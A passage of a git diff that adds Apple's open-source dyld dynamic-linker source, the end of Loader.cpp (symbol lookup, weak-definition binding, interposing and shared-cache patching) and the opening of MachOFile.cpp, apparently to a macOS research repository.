if ( ldr->hiddenFromFlat() ) + continue; + if ( ldr->hasExportedSymbol(diag, state, symbolName, Loader::shallow, &thisResult) ) { + if ( weakBindOpcodeClient && !thisResult.isWeakDef && ldr->dylibInDyldCache ) { + // rdar://75956202 ignore non-weak symbols in shared cache when opcode based binary is looking for symbols to coalesce + continue; + } + if ( thisResult.targetLoader->dylibInDyldCache && !ldr->hasBeenFixedUp(state) ) + cacheResults.push_back({ thisResult.targetLoader, thisResult.targetRuntimeOffset }); + + // record first implementation found, but keep searching + if ( !foundFirst ) { + foundFirst = true; + result = thisResult; + if ( verboseWeak ) + state.log(" using %s in %s\n", symbolName, thisResult.targetLoader->path()); + } + if ( !thisResult.isWeakDef && result.isWeakDef ) { + // non-weak wins over previous weak-def + // we don't stop search because we need to see if this overrides anything in the dyld cache + result = thisResult; + if ( verboseWeak ) + state.log(" using non-weak %s in %s\n", symbolName, thisResult.targetLoader->path()); + } + } + } + } + // if not found anywhere else and this image is hidden, try looking in itself + if ( !foundFirst && this->hiddenFromFlat() ) { + if ( verboseWeak ) + state.log(" did not find unhidden %s, trying self (%s)\n", symbolName, this->leafName()); + ResolvedSymbol thisResult; + if ( this->hasExportedSymbol(diag, state, symbolName, Loader::shallow, &thisResult) ) { + foundFirst = true; + result = thisResult; + } + } + + // Patch the cache if we chose a definition which overrides it + if ( foundFirst && !cacheResults.empty() && !result.targetLoader->dylibInDyldCache && (patcher != nullptr) ) { + uint64_t patchedCacheOffset = 0; + for ( const CacheLookupResult& cacheResult : cacheResults ) { + // We have already found the impl which we want all clients to use. + // But, later in load order we see something in the dyld cache that also implements + // this symbol, so we need to change all caches uses of that to use the found one instead. + const MachOFile* cacheMF = cacheResult.targetLoader->mf(state); + uint32_t cachedOverriddenDylibIndex; + if ( state.config.dyldCache.findMachHeaderImageIndex(cacheMF, cachedOverriddenDylibIndex) ) { + // Use VMAddr's as the cache may not exist if we are in the builder + uint64_t cacheOverriddenExportVMAddr = cacheMF->preferredLoadAddress() + cacheResult.targetRuntimeOffset; + uint64_t cacheOverriddenExportOffset = cacheOverriddenExportVMAddr - state.config.dyldCache.unslidLoadAddress; + if ( cacheOverriddenExportOffset != patchedCacheOffset ) { + // because of re-exports, same cacheOffset shows up in multiple dylibs. Only call patcher once per + if ( verboseWeak ) + state.log(" found use of %s in cache, need to override: %s\n", symbolName, cacheResult.targetLoader->path()); + patcher(cachedOverriddenDylibIndex, (uint32_t)cacheResult.targetRuntimeOffset, result); + patchedCacheOffset = cacheOverriddenExportOffset; + } + } + } + } + }); + if ( foundFirst ) { + // if a c++ dylib weak-def binds to another dylibs, record the dynamic dependency + if ( result.targetLoader != this ) + state.addDynamicReference(this, result.targetLoader); + // if we are using a map to cache weak-def resolution, add to map + if ( (state.weakDefMap != nullptr) && !result.targetLoader->hiddenFromFlat() ) { + WeakDefMapValue mapEntry; + mapEntry.targetLoader = result.targetLoader; + mapEntry.targetRuntimeOffset = result.targetRuntimeOffset; + mapEntry.isCode = result.isCode; + mapEntry.isWeakDef = result.isWeakDef; + state.weakDefMap->operator[](symbolName) = mapEntry; + } + } + else { + if ( weakImport ) { + // ok to be missing, bind to NULL + result.kind = ResolvedSymbol::Kind::bindAbsolute; + result.targetRuntimeOffset = 0; + } + else { + diag.error("weak-def symbol not found '%s'", symbolName); + } + } + return result; + } + else { + diag.error("unknown library ordinal %d in %s when binding '%s'", libOrdinal, path(), symbolName); + return result; + } + if ( result.targetLoader != nullptr ) { + STACK_ALLOC_ARRAY(const Loader*, alreadySearched, state.loaded.size()); + if ( result.targetLoader->hasExportedSymbol(diag, state, symbolName, Loader::staticLink, &result, &alreadySearched) ) { + return result; + } + } + if ( weakImport ) { + // ok to be missing, bind to NULL + result.kind = ResolvedSymbol::Kind::bindAbsolute; + result.targetRuntimeOffset = 0; + } + else if ( lazyBind && (state.libdyldMissingSymbolRuntimeOffset != 0) ) { + // missing lazy binds are bound to abort + result.targetLoader = state.libdyldLoader; + result.targetSymbolName = symbolName; + result.targetRuntimeOffset = (uintptr_t)state.libdyldMissingSymbolRuntimeOffset; + result.kind = ResolvedSymbol::Kind::bindToImage; + result.isCode = false; // only used for arm64e which uses trie not nlist + result.isWeakDef = false; + result.isMissingFlatLazy = false; + } + else { + // if libSystem.dylib has not been initialized yet, then the missing symbol is during launch and need to save that info + const char* expectedInDylib = "unknown"; + if ( result.targetLoader != nullptr ) + expectedInDylib = result.targetLoader->path(); +#if BUILDING_DYLD && !TARGET_OS_EXCLAVEKIT + if ( !state.libSystemInitialized() ) { + state.setLaunchMissingSymbol(symbolName, expectedInDylib, this->path()); + } +#endif + // rdar://79796526 add UUID to error message + char fromUuidStr[64]; + this->getUuidStr(state, fromUuidStr); + char expectedUuidStr[64]; + if ( result.targetLoader != nullptr ) + result.targetLoader->getUuidStr(state, expectedUuidStr); + else + strlcpy(expectedUuidStr, "no uuid", sizeof(expectedUuidStr)); + + // rdar://15648948 (On fatal errors, check binary's min-OS version and note if from the future) + Diagnostics tooNewBinaryDiag; + this->tooNewErrorAddendum(tooNewBinaryDiag, state); + + diag.error("Symbol not found: %s\n Referenced from: <%s> %s%s\n Expected in: <%s> %s", + symbolName, fromUuidStr, this->path(), tooNewBinaryDiag.errorMessageCStr(), expectedUuidStr, expectedInDylib); + } + return result; +} + +// if the binary for this Loader is newer than dyld, then we are trying to run a too new binary +void Loader::tooNewErrorAddendum(Diagnostics& diag, RuntimeState& state) const +{ + __block Platform dyldPlatform = Platform::unknown; + __block uint32_t dyldMinOS = 0; + ((MachOFile*)(&__dso_handle))->forEachSupportedPlatform(^(Platform plat, uint32_t minOS, uint32_t sdk) { + dyldPlatform = plat; + dyldMinOS = minOS; + }); + this->mf(state)->forEachSupportedPlatform(^(Platform plat, uint32_t minOS, uint32_t sdk) { + if ( (plat == dyldPlatform) && (minOS > dyldMinOS) ) { + char versionString[32]; + MachOFile::packedVersionToString(minOS, versionString); + diag.error(" (built for %s %s which is newer than running OS)", + MachOFile::platformName(dyldPlatform), versionString); + } + }); +} + +bool Loader::hasExportedSymbol(Diagnostics& diag, RuntimeState& state, const char* symbolName, ExportedSymbolMode mode, ResolvedSymbol* result, dyld3::Array* alreadySearched) const +{ + // don't search twice + if ( alreadySearched != nullptr ) { + for ( const Loader* im : *alreadySearched ) { + if ( im == this ) + return false; + } + alreadySearched->push_back(this); + } + bool canSearchDependents; + bool searchNonReExports; + bool searchSelf; + ExportedSymbolMode depsMode; + switch ( mode ) { + case staticLink: + canSearchDependents = true; + searchNonReExports = false; + searchSelf = true; + depsMode = staticLink; + break; + case shallow: + canSearchDependents = false; + searchNonReExports = false; + searchSelf = true; + depsMode = shallow; + break; + case dlsymNext: + canSearchDependents = true; + searchNonReExports = true; + searchSelf = false; + depsMode = dlsymSelf; + break; + case dlsymSelf: + canSearchDependents = true; + searchNonReExports = true; + searchSelf = true; + depsMode = dlsymSelf; + break; + } + + // The cache builder can't use runtimeOffset's to get the exports trie. Instead use the layout from + // the builder + __block const uint8_t* trieStart = nullptr; + __block const uint8_t* trieEnd = nullptr; + __block bool hasTrie = false; +#if SUPPORT_VM_LAYOUT + const MachOLoaded* ml = this->loadAddress(state); + //state.log("Loader::hasExportedSymbol(%s) this=%s\n", symbolName, this->path()); + uint64_t trieRuntimeOffset; + uint32_t trieSize; + if ( this->getExportsTrie(trieRuntimeOffset, trieSize) ) { + trieStart = (uint8_t*)ml + trieRuntimeOffset; + trieEnd = trieStart + trieSize; + hasTrie = true; + } +#else + this->withLayout(diag, state, ^(const mach_o::Layout &layout) { + if ( layout.linkedit.exportsTrie.hasValue() ) { + trieStart = layout.linkedit.exportsTrie.buffer; + trieEnd = trieStart + layout.linkedit.exportsTrie.bufferSize; + hasTrie = true; + } + }); +#endif + + if ( hasTrie ) { + const uint8_t* node = MachOLoaded::trieWalk(diag, trieStart, trieEnd, symbolName); + //state.log(" trieStart=%p, trieSize=0x%08X, node=%p, error=%s\n", trieStart, trieSize, node, diag.errorMessage()); + if ( (node != nullptr) && searchSelf ) { + const uint8_t* p = node; + const uint64_t flags = MachOLoaded::read_uleb128(diag, p, trieEnd); + if ( flags & EXPORT_SYMBOL_FLAGS_REEXPORT ) { + // re-export from another dylib, lookup there + const uint64_t ordinal = MachOLoaded::read_uleb128(diag, p, trieEnd); + const char* importedName = (char*)p; + bool nameChanged = false; + if ( importedName[0] == '\0' ) { + importedName = symbolName; + } else if ( strcmp(importedName, symbolName) != 0 ) { + nameChanged = true; + } + if ( (ordinal == 0) || (ordinal > this->dependentCount()) ) { + diag.error("re-export ordinal %lld in %s out of range for %s", ordinal, this->path(), symbolName); + return false; + } + uint32_t depIndex = (uint32_t)(ordinal - 1); + DependentKind depKind; + if ( Loader* depLoader = this->dependent(state, depIndex, &depKind) ) { + // Explicitly promote to a ::staticLink + // resolution when looking for a reexported symbol in ::shallow mode. + // The symbol might be located in one of the reexported libraries + // of the dependent. If the caller checks all loaders with + // ::shallow mode it won't be able to find an aliased symbol, + // because it will only look for the original name. + if ( nameChanged && mode == Loader::shallow ) + mode = Loader::staticLink; + if ( nameChanged && alreadySearched ) { + // As we are changing the symbol name we are looking for, use a new alreadySearched. The existnig + // alreadySearched may include loaders we have searched before for the old name, but not the new one, + // and we want to check them again + STACK_ALLOC_ARRAY(const Loader*, nameChangedAlreadySearched, state.loaded.size()); + return depLoader->hasExportedSymbol(diag, state, importedName, mode, result, &nameChangedAlreadySearched); + } + return depLoader->hasExportedSymbol(diag, state, importedName, mode, result, alreadySearched); + } + return false; // re-exported symbol from weak-linked dependent which is missing + } + else { + if ( diag.hasError() ) + return false; + bool isAbsoluteSymbol = ((flags & EXPORT_SYMBOL_FLAGS_KIND_MASK) == EXPORT_SYMBOL_FLAGS_KIND_ABSOLUTE); + result->targetLoader = this; + result->targetSymbolName = symbolName; + result->targetRuntimeOffset = (uintptr_t)MachOLoaded::read_uleb128(diag, p, trieEnd); + result->kind = isAbsoluteSymbol ? ResolvedSymbol::Kind::bindAbsolute : ResolvedSymbol::Kind::bindToImage; + result->isCode = this->mf(state)->inCodeSection((uint32_t)(result->targetRuntimeOffset)); + result->isWeakDef = (flags & EXPORT_SYMBOL_FLAGS_WEAK_DEFINITION); + result->isMissingFlatLazy = false; + return true; + } + } + } + else { + // try old slow way + const mach_o::MachOFileRef fileRef = this->mf(state); + __block bool found = false; + this->withLayout(diag, state, ^(const mach_o::Layout& layout) { + mach_o::SymbolTable symbolTable(layout); + + symbolTable.forEachGlobalSymbol(diag, ^(const char* n_name, uint64_t n_value, uint8_t n_type, + uint8_t n_sect, uint16_t n_desc, bool& stop) { + if ( ((n_type & N_TYPE) == N_SECT) && ((n_type & N_EXT) != 0) ) { + if ( strcmp(n_name, symbolName) == 0 ) { + result->targetLoader = this; + result->targetSymbolName = symbolName; + result->targetRuntimeOffset = (uintptr_t)(n_value - fileRef->preferredLoadAddress()); + result->kind = ResolvedSymbol::Kind::bindToImage; + result->isCode = false; // only used for arm64e which uses trie not nlist + result->isWeakDef = (n_desc & N_WEAK_DEF); + result->isMissingFlatLazy = false; + stop = true; + found = true; + } + } + }); + }); + if ( found ) + return true; + } + + if ( const JustInTimeLoader* jitThis = this->isJustInTimeLoader() ) { + if ( const PseudoDylib *pd = jitThis->pseudoDylib() ) { + const char *symbolNames[] = { symbolName }; + void *addrs[1] = { nullptr }; + _dyld_pseudodylib_symbol_flags flags[1] = { DYLD_PSEUDODYLIB_SYMBOL_FLAGS_NONE }; + if (char *errMsg = pd->lookupSymbols(symbolNames, addrs, flags)) { + diag.error("pseudo-dylib lookup error: %s", errMsg); + pd->disposeErrorMessage(errMsg); + return false; + } + if ( flags[0] & DYLD_PSEUDODYLIB_SYMBOL_FLAGS_FOUND ) { + result->targetLoader = this; + result->targetSymbolName = symbolName; + result->targetRuntimeOffset = (uintptr_t)addrs[0] - (uintptr_t)this->mf(state); + result->kind = ResolvedSymbol::Kind::bindToImage; + result->isCode = flags[0] & DYLD_PSEUDODYLIB_SYMBOL_FLAGS_CALLABLE; + result->isWeakDef = flags[0] & DYLD_PSEUDODYLIB_SYMBOL_FLAGS_WEAK_DEF; + result->isMissingFlatLazy = false; + return true; + } + } + } + + if ( canSearchDependents ) { + // Search re-exported dylibs + const uint32_t depCount = this->dependentCount(); + for ( uint32_t i = 0; i < depCount; ++i ) { + Loader::DependentKind depKind; + if ( Loader* depLoader = this->dependent(state, i, &depKind) ) { + //state.log("dep #%d of %p is %d %p (%s %s)\n", i, this, (int)depKind, depLoader, this->path(), depLoader->path()); + if ( (depKind == Loader::DependentKind::reexport) || (searchNonReExports && (depKind != Loader::DependentKind::upward)) ) { + if ( depLoader->hasExportedSymbol(diag, state, symbolName, depsMode, result, alreadySearched) ) + return true; + } + } + } + } + return false; +} + +#if BUILDING_DYLD || BUILDING_UNIT_TESTS +uintptr_t Loader::resolvedAddress(RuntimeState& state, const ResolvedSymbol& symbol) +{ + switch ( symbol.kind ) { + case ResolvedSymbol::Kind::rebase: + case ResolvedSymbol::Kind::bindToImage: + return (uintptr_t)symbol.targetLoader->loadAddress(state) + (uintptr_t)symbol.targetRuntimeOffset; + case ResolvedSymbol::Kind::bindAbsolute: + return (uintptr_t)symbol.targetRuntimeOffset; + } +} +#endif // BUILDING_DYLD || BUILDING_UNIT_TESTS + + + +uintptr_t Loader::interpose(RuntimeState& state, uintptr_t value, const Loader* forLoader) +{ + // ignore interposing on a weak function that does not exist + if ( value == 0 ) + return 0; + + // Always start with objc patching. This is required every when AMFI may not permit other interposing + for ( const InterposeTupleAll& tuple : state.patchedObjCClasses ) { + if ( tuple.replacee == value ) { + if ( state.config.log.interposing ) + state.log(" interpose replaced 0x%08lX with 0x%08lX in %s\n", value, tuple.replacement, forLoader ? forLoader->path() : "dlsym"); + return tuple.replacement; + } + } + + // Next singleton patching, which also may happen without other interposing + for ( const InterposeTupleAll& tuple : state.patchedSingletons ) { + if ( tuple.replacee == value ) { + if ( state.config.log.interposing ) + state.log(" interpose replaced 0x%08lX with 0x%08lX in %s\n", value, tuple.replacement, forLoader ? forLoader->path() : "dlsym"); + return tuple.replacement; + } + } + +#if !TARGET_OS_EXCLAVEKIT + // AMFI can ban interposing + // Note we check this here just in case someone tried to substitute a fake interposing tuples array in the state + if ( !state.config.security.allowInterposing ) + return value; +#endif + + // look for image specific interposing (needed for multiple interpositions on the same function) + for ( const InterposeTupleSpecific& tuple : state.interposingTuplesSpecific ) { + if ( (tuple.replacee == value) && (tuple.onlyImage == forLoader) ) { + if ( state.config.log.interposing ) + state.log(" interpose replaced 0x%08lX with 0x%08lX in %s\n", value, tuple.replacement, forLoader->path()); + return tuple.replacement; + } + } + + // no image specific interpose, so look for generic interpose + for ( const InterposeTupleAll& tuple : state.interposingTuplesAll ) { + if ( tuple.replacee == value ) { + if ( state.config.log.interposing ) + state.log(" interpose replaced 0x%08lX with 0x%08lX in %s\n", value, tuple.replacement, forLoader ? forLoader->path() : "dlsym"); + return tuple.replacement; + } + } + return value; +} + +#if (BUILDING_DYLD || BUILDING_UNIT_TESTS) && !TARGET_OS_EXCLAVEKIT +void Loader::applyInterposingToDyldCache(RuntimeState& state) +{ + const DyldSharedCache* dyldCache = state.config.dyldCache.addr; + if ( dyldCache == nullptr ) + return; // no dyld cache to interpose + if ( state.interposingTuplesAll.empty() ) + return; // no interposing tuples + + // make the cache writable for this block + DyldCacheDataConstScopedWriter patcher(state); + + state.setVMAccountingSuspending(true); + for ( const InterposeTupleAll& tuple : state.interposingTuplesAll ) { + uint32_t imageIndex; + uintptr_t cacheOffsetOfReplacee = tuple.replacee - (uintptr_t)dyldCache; + if ( !dyldCache->addressInText(cacheOffsetOfReplacee, &imageIndex) ) + continue; + + // Convert from a cache offset to an image offset + uint64_t mTime; + uint64_t inode; + const dyld3::MachOAnalyzer* imageMA = (dyld3::MachOAnalyzer*)(dyldCache->getIndexedImageEntry(imageIndex, mTime, inode)); + if ( imageMA == nullptr ) + continue; + + uint32_t dylibOffsetOfReplacee = (uint32_t)((dyldCache->unslidLoadAddress() + cacheOffsetOfReplacee) - imageMA->preferredLoadAddress()); + + dyldCache->forEachPatchableExport(imageIndex, ^(uint32_t dylibVMOffsetOfImpl, const char* exportName, + PatchKind patchKind) { + // Skip patching anything other than this symbol + if ( dylibVMOffsetOfImpl != dylibOffsetOfReplacee ) + return; + uintptr_t newLoc = tuple.replacement; + dyldCache->forEachPatchableUseOfExport(imageIndex, dylibVMOffsetOfImpl, + ^(uint64_t cacheVMOffset, MachOLoaded::PointerMetaData pmd, uint64_t addend, + bool isWeakImport) { + uintptr_t* loc = (uintptr_t*)((uintptr_t)dyldCache + cacheVMOffset); + uintptr_t newValue = newLoc + (uintptr_t)addend; + #if __has_feature(ptrauth_calls) + if ( pmd.authenticated ) { + newValue = dyld3::MachOLoaded::ChainedFixupPointerOnDisk::Arm64e::signPointer(newValue, loc, pmd.usesAddrDiversity, pmd.diversity, pmd.key); + *loc = newValue; + if ( state.config.log.interposing ) + state.log("interpose: *%p = %p (JOP: diversity 0x%04X, addr-div=%d, key=%s)\n", + loc, (void*)newValue, pmd.diversity, pmd.usesAddrDiversity, MachOLoaded::ChainedFixupPointerOnDisk::Arm64e::keyName(pmd.key)); + return; + } + #endif + if ( state.config.log.interposing ) + state.log("interpose: *%p = 0x%0llX (dyld cache patch) to %s\n", loc, newLoc + addend, exportName); + *loc = newValue; + }); + }); + } + state.setVMAccountingSuspending(false); +} + + +void Loader::applyCachePatchesToOverride(RuntimeState& state, const Loader* dylibToPatch, + uint16_t overriddenDylibIndex, const DylibPatch* patches, + DyldCacheDataConstLazyScopedWriter& cacheDataConst) const +{ + const DyldSharedCache* dyldCache = state.config.dyldCache.addr; + const MachOAnalyzer* dylibToPatchMA = dylibToPatch->analyzer(state); + uint32_t dylibToPatchIndex = dylibToPatch->ref.index; + + // Early return if we have no exports used in the client dylib. Then we don't need to walk every export + if ( !dyldCache->shouldPatchClientOfImage(overriddenDylibIndex, dylibToPatchIndex) ) + return; + + uint32_t patchVersion = dyldCache->patchInfoVersion(); + assert((patchVersion == 2) || (patchVersion == 3) || (patchVersion == 4)); + __block bool suspended = false; + __block const DylibPatch* cachePatch = patches; + dyldCache->forEachPatchableExport(overriddenDylibIndex, ^(uint32_t dylibVMOffsetOfImpl, const char* exportName, + PatchKind patchKind) { + const DylibPatch* patch = cachePatch; + ++cachePatch; + + // Skip patching objc classes and singletons. We'll handle those another way + switch ( patchKind ) { + case PatchKind::regular: + break; + case PatchKind::cfObj2: + if ( patch->overrideOffsetOfImpl == DylibPatch::singleton ) + return; + break; + case PatchKind::objcClass: + if ( patch->overrideOffsetOfImpl == DylibPatch::objcClass ) + return; + break; + } + + uintptr_t targetRuntimeAddress = BAD_ROOT_ADDRESS; // magic value to cause a unique crash is missing symbol in root is used + if ( patch->overrideOffsetOfImpl != DylibPatch::missingSymbol ) + targetRuntimeAddress = (uintptr_t)(this->loadAddress(state)) + ((intptr_t)patch->overrideOffsetOfImpl); + + dyldCache->forEachPatchableUseOfExportInImage(overriddenDylibIndex, dylibVMOffsetOfImpl, dylibToPatchIndex, + ^(uint32_t userVMOffset, + dyld3::MachOLoaded::PointerMetaData pmd, uint64_t addend, + bool isWeakImport) { + // ensure dyld cache __DATA_CONST is writeable + cacheDataConst.makeWriteable(); + + // overridden dylib may not effect this dylib, so only suspend when we find it does effect it + if ( !suspended ) { + state.setVMAccountingSuspending(true); + suspended = true; + } + + uintptr_t* loc = (uintptr_t*)((uint8_t*)dylibToPatchMA + userVMOffset); + uintptr_t newValue = targetRuntimeAddress + (uintptr_t)addend; + + // if client in dyld cache is ok with symbol being missing, set its use to NULL instead of bad-missing-value + if ( isWeakImport && (targetRuntimeAddress == BAD_ROOT_ADDRESS) ) + newValue = 0; + + // if overridden dylib is also interposed, use interposing + for ( const InterposeTupleAll& tuple : state.interposingTuplesAll ) { + if ( tuple.replacee == newValue ) { + newValue = tuple.replacement; + } + } +#if __has_feature(ptrauth_calls) + if ( pmd.authenticated && (newValue != 0) ) { + newValue = dyld3::MachOLoaded::ChainedFixupPointerOnDisk::Arm64e::signPointer(newValue, loc, pmd.usesAddrDiversity, pmd.diversity, pmd.key); + if ( *loc != newValue ) { + *loc = newValue; + if ( state.config.log.fixups ) { + state.log("cache fixup: *0x%012lX = 0x%012lX (*%s+0x%012lX = %s+0x%012lX) (JOP: diversity=0x%04X, addr-div=%d, key=%s)\n", + (long)loc, newValue, + dylibToPatch->leafName(), (long)userVMOffset, + this->leafName(), (long)patch->overrideOffsetOfImpl, + pmd.diversity, pmd.usesAddrDiversity, MachOLoaded::ChainedFixupPointerOnDisk::Arm64e::keyName(pmd.key)); + } + } + return; + } +#endif + if ( *loc != newValue ) { + *loc = newValue; + if ( state.config.log.fixups ) + state.log("cache fixup: *0x%012lX = 0x%012lX (*%s+0x%012lX = %s+0x%012lX)\n", + (long)loc, (long)newValue, + dylibToPatch->leafName(), (long)userVMOffset, + this->leafName(), (long)patch->overrideOffsetOfImpl); + } + }); + }); + // Ensure the end marker is as expected + assert(cachePatch->overrideOffsetOfImpl == DylibPatch::endOfPatchTable); + + if ( suspended ) + state.setVMAccountingSuspending(false); +} + + +void Loader::applyCachePatchesTo(RuntimeState& state, const Loader* dylibToPatch, DyldCacheDataConstLazyScopedWriter& cacheDataConst) const +{ + // do nothing if this dylib does not override something in the dyld cache + uint16_t overriddenDylibIndex; + const DylibPatch* patches; + if ( !this->overridesDylibInCache(patches, overriddenDylibIndex) ) + return; + if ( patches != nullptr ) + this->applyCachePatchesToOverride(state, dylibToPatch, overriddenDylibIndex, patches, cacheDataConst); + + // The override here may be a root of an iOSMac dylib, in which case we should also try patch uses of the macOS unzippered twin + if ( !this->isPrebuilt && state.config.process.catalystRuntime ) { + if ( const JustInTimeLoader* jitThis = this->isJustInTimeLoader() ) { + if ( const DylibPatch* patches2 = jitThis->getCatalystMacTwinPatches() ) { + uint16_t macOSTwinIndex = Loader::indexOfUnzipperedTwin(state, overriddenDylibIndex); + if ( macOSTwinIndex != kNoUnzipperedTwin ) + this->applyCachePatchesToOverride(state, dylibToPatch, macOSTwinIndex, patches2, cacheDataConst); + } + } + } +} + +void Loader::applyCachePatches(RuntimeState& state, DyldCacheDataConstLazyScopedWriter& cacheDataConst) const +{ + // do nothing if this dylib does not override something in the dyld cache + uint16_t overriddenDylibIndex; + const DylibPatch* patches; + if ( !this->overridesDylibInCache(patches, overriddenDylibIndex) ) + return; + + if ( patches == nullptr ) + return; + + const DyldSharedCache* dyldCache = state.config.dyldCache.addr; + + __block bool suspended = false; + __block const DylibPatch* cachePatch = patches; + dyldCache->forEachPatchableExport(overriddenDylibIndex, ^(uint32_t dylibVMOffsetOfImpl, const char* exportName, + PatchKind patchKind) { + const DylibPatch* patch = cachePatch; + ++cachePatch; + + // Skip patching objc classes and singletons. We'll handle those another way + switch ( patchKind ) { + case PatchKind::regular: + break; + case PatchKind::cfObj2: + if ( patch->overrideOffsetOfImpl == DylibPatch::singleton ) + return; + break; + case PatchKind::objcClass: + if ( patch->overrideOffsetOfImpl == DylibPatch::objcClass ) + return; + break; + } + + uintptr_t targetRuntimeAddress = BAD_ROOT_ADDRESS; // magic value to cause a unique crash is missing symbol in root is used + if ( patch->overrideOffsetOfImpl != DylibPatch::missingSymbol ) + targetRuntimeAddress = (uintptr_t)(this->loadAddress(state)) + ((intptr_t)patch->overrideOffsetOfImpl); + + dyldCache->forEachPatchableGOTUseOfExport(overriddenDylibIndex, dylibVMOffsetOfImpl, + ^(uint64_t cacheVMOffset, dyld3::MachOLoaded::PointerMetaData pmd, uint64_t addend, + bool isWeakImport) { + // ensure dyld cache __DATA_CONST is writeable + cacheDataConst.makeWriteable(); + + // overridden dylib may not effect this dylib, so only suspend when we find it does effect it + if ( !suspended ) { + state.setVMAccountingSuspending(true); + suspended = true; + } + uintptr_t* loc = (uintptr_t*)((uint8_t*)dyldCache + cacheVMOffset); + uintptr_t newValue = targetRuntimeAddress + (uintptr_t)addend; + + // if client in dyld cache is ok with symbol being missing, set its use to NULL instead of bad-missing-value + if ( isWeakImport && (targetRuntimeAddress == BAD_ROOT_ADDRESS) ) + newValue = 0; + +#if __has_feature(ptrauth_calls) + if ( pmd.authenticated && (newValue != 0) ) { + newValue = dyld3::MachOLoaded::ChainedFixupPointerOnDisk::Arm64e::signPointer(newValue, loc, pmd.usesAddrDiversity, pmd.diversity, pmd.key); + if ( *loc != newValue ) { + *loc = newValue; + if ( state.config.log.fixups ) { + state.log("cache GOT fixup: *0x%012lX = 0x%012lX (*cache+0x%012lX = %s+0x%012lX) (JOP: diversity=0x%04X, addr-div=%d, key=%s)\n", + (long)loc, newValue, (long)cacheVMOffset, + this->leafName(), (long)patch->overrideOffsetOfImpl, + pmd.diversity, pmd.usesAddrDiversity, + MachOLoaded::ChainedFixupPointerOnDisk::Arm64e::keyName(pmd.key)); + } + } + return; + } +#endif + if ( *loc != newValue ) { + *loc = newValue; + if ( state.config.log.fixups ) + state.log("cache GOT fixup: *0x%012lX = 0x%012lX (*cache+0x%012lX = %s+0x%012lX)\n", + (long)loc, (long)newValue, + (long)cacheVMOffset, + this->leafName(), (long)patch->overrideOffsetOfImpl); + } + }); + }); + // Ensure the end marker is as expected + assert(cachePatch->overrideOffsetOfImpl == DylibPatch::endOfPatchTable); + + if ( suspended ) + state.setVMAccountingSuspending(false); +} + +#endif // BUILDING_DYLD || BUILDING_UNIT_TESTS + +uint16_t Loader::indexOfUnzipperedTwin(const RuntimeState& state, uint16_t overrideIndex) +{ + if ( state.config.process.catalystRuntime ) { + // Find the macOS twin overridden index + if ( const PrebuiltLoaderSet* cachePBLS = state.cachedDylibsPrebuiltLoaderSet() ) { + const Loader* overridenDylibLdr = cachePBLS->atIndex(overrideIndex); + if ( const PrebuiltLoader* overridenDylibPBLdr = overridenDylibLdr->isPrebuiltLoader() ) { + if ( overridenDylibPBLdr->supportsCatalyst ) + return overridenDylibPBLdr->indexOfTwin; + } + } else { + // We might be running with an invalid version, so can't use Prebuilt loaders + const char* catalystInstallName = state.config.dyldCache.getIndexedImagePath(overrideIndex); + if ( strncmp(catalystInstallName, "/System/iOSSupport/", 19) == 0 ) { + const char* macTwinPath = &catalystInstallName[18]; + uint32_t macDylibCacheIndex; + if ( state.config.dyldCache.indexOfPath(macTwinPath, macDylibCacheIndex) ) + return macDylibCacheIndex; + } + } + } + + return kNoUnzipperedTwin; +} + +#if !TARGET_OS_EXCLAVEKIT +uint64_t Loader::getOnDiskBinarySliceOffset(RuntimeState& state, const MachOAnalyzer* ma, const char* path) +{ +#if BUILDING_DYLD +#if TARGET_OS_OSX && __arm64__ + // these are always thin and sanboxing blocks open()ing them + if ( strncmp(path, "/usr/libexec/rosetta/", 21) == 0 ) + return 0; +#endif + __block Diagnostics diag; + __block uint64_t sliceOffset = 0; + state.config.syscall.withReadOnlyMappedFile(diag, path, false, ^(const void* mapping, size_t mappedSize, bool isOSBinary, const FileID& fileID, const char* realPath) { + if ( const dyld3::FatFile* ff = dyld3::FatFile::isFatFile(mapping) ) { + ff->forEachSlice(diag, mappedSize, ^(uint32_t sliceCpuType, uint32_t sliceCpuSubType, const void* sliceStart, uint64_t sliceSize, bool& stop) { + if ( memcmp(ma, sliceStart, 64) == 0 ) { + sliceOffset = (uint8_t*)sliceStart - (uint8_t*)mapping; + stop = true; + } + }); + } + }); + return sliceOffset; +#else + // don't record a sliceOffset when the dyld cache builder is run in Mastering because the file may be thinned later + return 0; +#endif +} +#endif // !TARGET_OS_EXCLAVEKIT + +} // namespace \ No newline at end of file diff --git a/IV. Dylibs/macos/MachOFile.cpp b/IV. Dylibs/macos/MachOFile.cpp new file mode 100644 index 0000000..cfbfa38 --- /dev/null +++ b/IV. Dylibs/macos/MachOFile.cpp @@ -0,0 +1,4094 @@ +// Source (dyld-1122.1) https://github.com/apple-oss-distributions/dyld/blob/18d3cb0f6b46707fee6d315cccccf7af8a8dbe57/common/MachOFile.cpp#L1213C25-L1213C25 +/* + * Copyright (c) 2017 Apple Inc. All rights reserved. + * @APPLE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this + * file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_LICENSE_HEADER_END@ + */ + +#include +#include +#include +#include +#include +#include +#include "Defines.h" +#if TARGET_OS_EXCLAVEKIT + #define OSSwapBigToHostInt32 __builtin_bswap32 + #define OSSwapBigToHostInt64 __builtin_bswap64 + #define htonl __builtin_bswap32 +#else + #include + #include + #include + #include + #include + #include + #include + #include +#if SUPPORT_CLASSIC_RELOCS + #include + #include +#endif +extern "C" { + #include + #include + #include +} +#endif + +#include "Defines.h" + +#include + +#include "Array.h" +#include "MachOFile.h" +#include "SupportedArchs.h" +#include "CodeSigningTypes.h" + +#if (BUILDING_DYLD || BUILDING_LIBDYLD) && !TARGET_OS_EXCLAVEKIT + #include +#endif + +namespace dyld3 { + +#if !TARGET_OS_EXCLAVEKIT + +//////////////////////////// posix wrappers //////////////////////////////////////// + +// wrap calls to stat() with check for EAGAIN +int stat(const char* path, struct stat* buf) +{ + int result; + do { +#if 